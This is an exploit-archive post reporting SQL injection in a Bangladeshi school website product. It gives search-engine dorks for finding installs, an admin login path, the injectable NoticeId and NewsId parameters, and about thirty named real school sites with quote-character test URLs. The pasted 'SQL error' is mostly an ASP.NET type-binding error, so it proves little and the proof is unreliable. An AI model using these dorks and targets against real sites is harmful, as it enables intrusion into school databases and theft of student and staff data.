পাঠশালা inventusltd Software Development Bangladesh Education SQL Injection Vulnerability

2018.11.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : A product of পাঠশালা inventusltd Software Development Bangladesh Education SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/11/2018 # Vendor Homepage : inventusltd.com # Tested On : Windows and Linux # Category : WebApps # Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.34009 # Google Dorks : intext:''© All rights reserved, A product of পাঠশালা'' site:edu.bd intext:''A product of পাঠশালা'' site:edu.bd # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Admin Panel Login Path : DOMAINADDRESSNAMEHERE.inventusltd.com/security/Login /Home/Login ################################################################################################# # SQL Injection Exploit : /Detail/NoticeDetails?NoticeId=[SQL Injection] /Detail/NewsDetails?NewsId=[SQL Injection] ################################################################################################# # Example Vulnerable Sites => [+] tascam.edu.bd/Detail/NoticeDetails?NoticeId=12%27 [+] bgsc.edu.bd/detail/NoticeDetails?NoticeId=1%27 [+] mbhss.edu.bd/detail/NoticeDetails?NoticeId=1%27 [+] kakm.edu.bd/detail/NoticeDetails?NoticeId=1%27 [+] svgghs.edu.bd/Detail/NoticeDetails?NoticeId=7%27 [+] nazrulshikshalaya.edu.bd/detail/NoticeDetails?NoticeId=1%27 [+] purbarampurahighschool.edu.bd/detail/NoticeDetails?NoticeId=1%27 [+] pgsc.edu.bd/detail/NoticeDetails?NoticeId=1%27 [+] chunkutiagirlshighschool.edu.bd/Detail/NoticeDetails?NoticeId=1%27 [+] aasac.edu.bd/Detail/NewsDetails?NewsId=11%27 [+] tntboyshighschoolbanani.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] sunwaydhaka.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] kpbsc.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] nazneenschoolandcollege.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] jisc.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] banasreemodel.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] kpbsc.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] bmtfhighschool.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] bahukahighschool.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] bmhjhs.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] purbarampurahighschool.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] bmmf2192.com/Detail/NewsDetails?NewsId=1%27 [+] padhshala.com/Detail/NewsDetails?NewsId=1%27 [+] dogairmodelhighschool.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] rcsc.com.bd/Detail/NewsDetails?NewsId=1%27 [+] gkumb.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] shahidnabihighschool.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] kgchss.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] kamarjurihighschool.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] hajisayedalikhanschoolandcollege.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] silverdale.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] ahsanulhabibhighschool.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] nsahs.edu.bd/Detail/NewsDetails?NewsId=1%27 [+] victoriahighschool.edu.bd/Detail/NewsDetails?NewsId=1%27 ################################################################################################# # SQL Database Error [ ASP.Net MVC SQL Error ] : Server Error in '/' Application. The parameters dictionary contains a null entry for parameter 'noticeId' of non-nullable type 'System.Int32' for method 'System.Web.Mvc.ActionResult NoticeDetails(Int32)' in 'Application.Web.Controllers.DetailController'. An optional parameter must be a reference type, a nullable type, or be declared as an optional parameter. Parameter name: parameters Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4''' at line 1 Exception Details: System.ArgumentException: The parameters dictionary contains a null entry for parameter 'noticeId' of non-nullable type 'System.Int32' for method 'System.Web.Mvc.ActionResult NoticeDetails(Int32)' in 'Application. Web.Controllers.DetailController'. An optional parameter must be a reference type, a nullable type, or be declared as an optional parameter. Parameter name: parameters Source Error: An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below. Stack Trace: [ArgumentException: The parameters dictionary contains a null entry for parameter 'noticeId' of non-nullable type 'System.Int32' for method 'System.Web.Mvc.ActionResult NoticeDetails(Int32)' in 'Application. Web.Controllers.DetailController'. An optional parameter must be a reference type, a nullable type, or be declared as an optional parameter. Parameter name: parameters] System.Web.Mvc.ActionDescriptor.ExtractParameterFromDictionary(ParameterInfo parameterInfo, IDictionary`2 parameters, MethodInfo methodInfo) +658 System.Web.Mvc.ReflectedActionDescriptor.Execute(ControllerContext controllerContext, IDictionary`2 parameters) +113 System.Web.Mvc.ControllerActionInvoker.InvokeActionMethod(ControllerContext controllerContext, ActionDescriptor actionDescriptor, IDictionary`2 parameters) +39 System.Web.Mvc.Async.AsyncControllerActionInvoker.<BeginInvokeSynchronousActionMethod>b__36(IAsyncResult asyncResult, ActionInvocation innerInvokeState) +12 System.Web.Mvc.Async.WrappedAsyncResult`2.CallEndDelegate(IAsyncResult asyncResult) +139 System.Web.Mvc.Async.AsyncInvocationWithFilters.<InvokeActionMethodFilterAsynchronouslyRecursive>b__3c() +112 System.Web.Mvc.Async.<>c__DisplayClass45.<InvokeActionMethodFilterAsynchronouslyRecursive>b__3e() +452 System.Web.Mvc.Async.<>c__DisplayClass30.<BeginInvokeActionMethodWithFilters>b__2f(IAsyncResult asyncResult) +15 System.Web.Mvc.Async.<>c__DisplayClass28.<BeginInvokeAction>b__19() +37 System.Web.Mvc.Async.<>c__DisplayClass1e.<BeginInvokeAction>b__1b(IAsyncResult asyncResult) +241 System.Web.Mvc.Controller.<BeginExecuteCore>b__1d(IAsyncResult asyncResult, ExecuteCoreState innerState) +29 System.Web.Mvc.Async.WrappedAsyncVoid`1.CallEndDelegate(IAsyncResult asyncResult) +111 System.Web.Mvc.Controller.EndExecuteCore(IAsyncResult asyncResult) +53 System.Web.Mvc.Async.WrappedAsyncVoid`1.CallEndDelegate(IAsyncResult asyncResult) +19 System.Web.Mvc.MvcHandler.<BeginProcessRequest>b__4(IAsyncResult asyncResult, ProcessRequestState innerState) +51 System.Web.Mvc.Async.WrappedAsyncVoid`1.CallEndDelegate(IAsyncResult asyncResult) +111 System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +606 System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +288 Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.34009 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-a-product-of-inventusltd-software-bd-edu-sql-inj-expl.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top